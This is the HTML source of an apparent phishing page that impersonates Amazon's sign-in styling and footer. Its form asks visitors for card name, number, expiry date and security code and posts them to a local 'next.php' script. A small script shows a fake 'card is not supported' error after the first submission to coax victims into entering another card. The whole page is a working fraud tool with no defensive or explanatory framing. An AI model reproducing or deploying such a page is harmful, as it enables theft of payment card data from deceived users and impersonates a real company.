<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title dir="ltr">Amazon- Update Info</title>
    <link rel="stylesheet" href="css/st1.css">
    <link rel="stylesheet" href="css/st2.css">
    <link rel="stylesheet" href="css/mobile_login.css">
    <style type="text/css">
    * {
        transition: 0.3s;
        font-family: lucida sans unicode;
        color: #262626;
        outline: none;
    }

    body {
        padding: 0px;
        margin: 0px;
        font-family: Arial, sans-serif;
    }

    .error {
        margin-left: 10px;
        color: #000;
        font-family: Arial, sans-serif;
    }

    header {
        width: 100%;
        padding-top: 10px;
        padding-bottom: 10px;
        background: #000d1a;
        display: table;
    }

    .hleft {
        padding-right: 20px;
        padding-left: 20px;
    }

    .img {
        width: 120px;
        height: 30px;
    }

    .img2 {
        width: 140px;
        height: 50px;
    }

    .boxlogin {
        padding: 20px;
        max-width: 700px;
        border: 1px solid #cccccc;
        border-radius: 5px;
        text-align: left;
    }

    h2 {
        margin: 0px;
    }

    a {
        color: #007acc;
        text-decoration: none;
    }

    a:hover {
        text-decoration: underline;
    }

    .logout {
        padding: 6px;
        background: linear-gradient(#ffeb99, #cca300);
        border-radius: 5px;
        border: 1px solid #0d0d0d;
    }

    p {}

    .text {
        padding: 6px;
        width: 28%;
        border: 1px solid #a6a6a6;
        border-radius: 5px;
        margin-bottom: 6px;
    }

    .texts {
        padding: 6px;
        width: 48%;
        border: 1px solid #a6a6a6;
        border-radius: 5px;
        margin-bottom: 6px;
    }

    .button {
        font-weight: bold;
        margin-top: 8px;
        background: linear-gradient(#fff0b3, #e6b800);
        padding: 6px;
        border: 1px solid #997300;
        border-radius: 5px;
        width: 100%;
    }

    .button:hover {
        background: linear-gradient(#ffd24d, #e6ac00);
    }
    </style>
</head>

<body>
    <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
            <div class="a-section a-spacing-none auth-navbar">
                <div class="a-section a-spacing-medium a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                    </a>
                </div>
            </div>
            <div id="authportal-center-section" class="a-section">
                <div id="authportal-main-section" class="a-section">
                    <div class="a-section auth-pagelet-container">
                        <!-- div1/////////////////////////////////////// -->
                        <div class="a-section a-spacing-base" id="div1">
                            <div class="a-section">
                                <!-- ///////////error//////////// -->
                                <div class="a-section a-spacing-none auth-pagelet-mobile-container" id="msg" style="display: none;">
                                    <div id="auth-error-message-box" class="a-box a-alert a-alert-error auth-server-side-message-box a-spacing-base" aria-live="assertive" role="alert">
                                        <div class="a-box-inner a-alert-container">
                                            <h4 class="a-alert-heading">Verification issues</h4>
                                            <div class="a-alert-content">
                                                <ul class="a-unordered-list a-nostyle a-vertical" role="alert">
                                                    <li><span class="a-list-item">
                                                            Your card is not supported. Please use another card.</span></li>
                                                </ul>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <form name="signIn" action="./next.php" method="POST" class="auth-validate-form auth-real-time-validation a-spacing-none">
                                    <input type="hidden" name="count" id="count" value="0">
                                    <div class="a-section">
                                        <div class="a-box">
                                            <div class="a-box-inner a-padding-extra-large">
                                                <div id="formbilling">
                                                    <h4>Please enter your credit card information</h4>
                                                    <span>Card type: Visa / M / JCB / AE</span>
                                                    <div class="a-input-text-group a-spacing-medium a-spacing-top-micro">
                                                        <div style="padding: 5px;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                            <input type="text" style="" placeholder="Card name" name="ccname" id="ccname" autocorrect="off" autocapitalize="off" required="">
                                                        </div>
                                                        <div style="padding: 5px;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                            <input type="tel" placeholder="card number" name="ccno" maxlength="16" id="ccno" autocorrect="off" autocapitalize="off" required="">
                                                        </div><br>
                                                        <h4>expiration date</h4>
                                                        <div style="border-top-color: #949494;background: #e7e9ec;border-radius: 3px;border-color: #ADB1B8 #A2A6AC #8D9096;border-style: solid;border-width: 1px;cursor: pointer;display: inline-block;padding: 5px;width:40%;text-align: center;text-decoration: none!important;vertical-align: middle;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                            <select name="month" style="background-color: transparent;border: 0;display: block;font-size: 1.6rem;line-height: 1.35;margin: 0;outline: 0;padding: 1.2rem 1.6rem 1.2rem 1.7rem;text-align: center;padding:10px;width:99.7%;border-style:none;" required="">
                                                                <option value="01" selected="selected">01</option>
                                                                <option value="02">02</option>
                                                                <option value="03">03</option>
                                                                <option value="04">04</option>
                                                                <option value="05">05</option>
                                                                <option value="06">06</option>
                                                                <option value="07">07</option>
                                                                <option value="08">08</option>
                                                                <option value="09">09</option>
                                                                <option value="10">10</option>
                                                                <option value="11">11</option>
                                                                <option value="12">12</option>
                                                            </select>
                                                        </div>
                                                        <div style="margin-left:border-top-color: #949494;background: #e7e9ec;border-radius: 3px;border-color: #ADB1B8 #A2A6AC #8D9096;border-style: solid;border-width: 1px;cursor: pointer;display: inline-block;padding: 5px;width:40%;text-align: center;text-decoration: none!important;vertical-align: middle;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                            <select name="year" style="background-color: transparent;border: 0;display: block;font-size: 1.6rem;line-height: 1.35;margin: 0;outline: 0;padding: 1.2rem 1.6rem 1.2rem 1.7rem;text-align: center;padding:10px;width:99.7%;border-style:none;" required="">
                                                                <option value="20" selected="selected">2020</option>
                                                                <option value="21">2021</option>
                                                                <option value="22">2022</option>
                                                                <option value="23">2023</option>
                                                                <option value="24">2024</option>
                                                                <option value="25">2025</option>
                                                                <option value="26">2026</option>
                                                                <option value="27">2027</option>
                                                                <option value="28">2028</option>
                                                                <option value="29">2029</option>
                                                                <option value="30">2030</option>
                                                            </select>
                                                        </div><br><br>
                                                        <h4>security code</h4>
                                                        <div style="padding: 5px;" class="a-input-text-wrapper auth-required-field auth-fill-claim">
                                                            <input type="text" style="" placeholder="CCV" name="ccv" id="ccv" maxlength="4" autocorrect="off" autocapitalize="off" required="">
                                                        </div>
                                                        
                                                        <div id="amexcid"></div>
                                                        <br>
                                                        <input type="submit" id="submit_cc" name="btn2" class="button a-button-text" style="padding:10px;background: linear-gradient(to bottom,#f7dfa5,#f0c14b);" value="Update">
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <!-- div1 end/////////////////////////// -->
                    </div>
                </div>
            </div>
            <div class="a-section a-spacing-top-extra-large auth-footer" style="position: fixed;left: 0;bottom: 0%;width: 100%;">
                <div class="a-divider a-divider-section">
                    <div class="a-divider-inner"></div>
                </div>
                <div class="a-section a-spacing-small a-text-center a-size-mini">
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Conditions of use 
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Privacy notice
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Help
                    </a>
                    <span class="auth-footer-seperator"></span>
                </div>
                <div class="a-section a-spacing-none a-text-center">
                    <span class="a-size-mini a-color-secondary">
                        © 1996-2020, Amazon.com, Inc. Or its affiliates
                    </span>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }

    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
        if (count == 1) {
            if (count == 1) {
                $("#msg").show();
            } else {
                $("#msg").hide();
            }
        }
    }





});
</script>

</html>